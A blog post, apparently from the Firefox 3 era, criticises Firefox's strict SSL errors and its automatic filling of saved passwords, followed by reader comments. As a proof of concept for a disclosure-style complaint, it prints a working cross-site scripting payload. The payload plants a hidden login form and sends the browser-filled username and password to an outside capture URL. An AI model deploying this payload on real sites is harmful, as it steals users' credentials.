I am in your Firefox, stealing your Passwords

The Firefox developers have their security and usability priorities all muddled up. You can't access my self-signed website, but I can steal your passwords without you even knowing. And they think this makes your browser better.

In Firefox 3, they introduced stricter SSL certificate checks that give you an error page that you can't turn off. It's a usability nightmare if it's a site you want to get in to; there are 4 mouse clicks, all over the screen to add the site - amusingly, 5 if you only want to add it temporarily. Reminds me of Vista UAC. Extremely annoying for people who may run several HTTPS sites on a dev machine, or who need to access scripts on specific machines behind a load balanced secure site, for example.

Sacrificing usability for security is something I can forgive, even condone - although I can't see quite what's so bad about the way IE 7 does it, with a big warning saying "Actually, you don't want to open this". However, it's not a sacrifice Firefox wants to make across the board. Look at the password manager.

Just log in once, and whenever you open another page on the site that prompts for your username and password, it'll pre-populate it for you. Handy, eh?

I'm not talking about an autocomplete option when you start typing, like they do in IE; no, it fills it out for you as soon as you open the page. I thought this was new to FF3, but looking back they've been doing it in FF2 too.

Significant usability gain? No. In fact, they've "improved" form detection in FF3 and have made it a usability nightmare. Now it does it anywhere it finds a password field, regardless of context. Imagine a form on a site that prompts you for a password to a different resource; it's now always populated with the wrong password. Or more commonly, imagine a form that lets you change your details, and has a field to change your password if you provide your current one. Click save and *ding*! Error! Or even better, you've now got a blank password (and don't know why you can't log back in). Now they're sacrificing usability for usability!

Bugzilla comments say if you've got a form like that, you should set the autocomplete="no" form attribute. Great, but that's like saying they're now not going to render HTML if it contains presentational markup - I'm screwed on a major proportion of sites I use.

But wait, why am I talking about mere annoyances, when I can be talking about a vulnerability, at least when combined with XSS. Let me show you:

  1. Log in to a site that doesn't parse user comments properly.
  2. Leave a new comment:
    I LOVE THIS SITE, AAA+++++++=+++!!!1!
    <script>
    document.write('<form style="display:none">' +
      '<input type="text" name="username" id="username">' +
      '<input type="password" name="password"></form>');
    window.onload = function () {
      (new Image).src = 'http://radiac.net/capture?u=' +
        document.getElementsByName('username')[0].value +
        '&p=' + document.getElementsByName('password')[0].value
      ;
    }
    </script>
    
  3. Profit.

That's just the quick version before we start trying. And the best bit? There are bug reports about this in Bugzilla going back to 2006. The response to that bug was the same as to similar bugs being submitted now:

I don't think we should sacrifice usability this much just to slightly mitigate the effect of a successful XSS attack.

Slightly mitigate the effect? Slightly?! I just stole all your visitors' usernames and passwords!

Other comments say once a site's been injected with malicious code, it's already game over, but this isn't some obscure Quicktime hack that'll only last until the next bug fix - this is an officially sanctioned feature. With this, it doesn't matter if I can't inject code onto the login page to sniff keypresses, or if you do clever stuff with your session cookies to make sure they can't be copied - all I need is one tiny corner of your site, and I have their password. I am now them.

Still, at least they don't have to click two buttons to select their login from the dropdown. I'm sure that'll keep them happy while I'm finding out which other sites I can now access. Please, just let me get one for play.

Update: If you use firefox and are looking for a way to save yourself from this issue, the Mozilla site has information on how to turn off form autocompletion.

Comments

It all sounds like a reasonable complaint. I'd never have noticed it, though, had you not mentioned it, since my default setting for remembering passwords is "no". I'm certainly not going to let my browser do that.

In my opinion, remembering passwords shouldn't even be an option, and I've done my best to disable it on the sites I create. I want my users to be aware of what their passwords are at all times, since at some point, they are going to need it - and I don't want them poking their head into my office every 5 minutes asking for a new one.

Good luck with getting the Mozilla people to acknowledge it, though. The couple of times I've tried to bring stuff to their attention their reaction has been that they know best, and that they design for the majority of users - to the extent of leaving out options that would only be useful to the minority (such as stuff for mass installations in a university style setting...)

I set remember passwords to off on anything important, but it's handy for a few sites with non-persistent sessions that I have to log into several times a day.

Mozilla seem so hell-bent on gaining more market share that they're forgetting the devs and admins who have got them where they are today. Thanks to Firefox 3, they've certainly moved up a few spots on my list - right in between Wikipedia deletionists and Debian package maintainers.

Browsers have got to be the worst place to keep passwords. Of ways that attackers have into your system, your web browser has to be up there as one of the easiest.

Leave a comment